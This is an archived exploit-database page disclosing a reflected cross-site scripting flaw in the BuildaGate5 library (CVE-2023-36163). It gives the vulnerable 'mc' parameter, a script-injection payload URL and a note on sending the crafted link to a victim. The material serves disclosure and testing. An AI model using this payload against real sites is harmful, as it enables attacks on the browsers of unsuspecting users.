BuildaGate5 Cross Site Scripting

BuildaGate5 Cross Site Scripting: Posted Jul 11, 2023; Authored by Idan Malihi; The BuildaGate5 library suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2023-36163; SHA-256 | cc7f52d929255d8a156c7d167fff822b4dafeaafc382528ba23b8bd3d31b7a06; Download | Favorite | View

BuildaGate5 Cross Site Scripting

# Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36163

#PoC:
An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
'><script>prompt("XSS");</script><div id="aa

After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.

#Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa

Top Authors In Last 30 Days

Red Hat 244 files
Ubuntu 86 files
Gentoo 31 files
Debian 17 files
tmrswrr 8 files
Sina Kheirkhah 7 files
indoushka 5 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
bRpsd 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,456)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,351)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,673)
UNIX (9,429)
UnixWare (187)
Windows (6,667)
Other

BuildaGate5 Cross Site Scripting

BuildaGate5 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

BuildaGate5 Cross Site Scripting

Share This

BuildaGate5 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems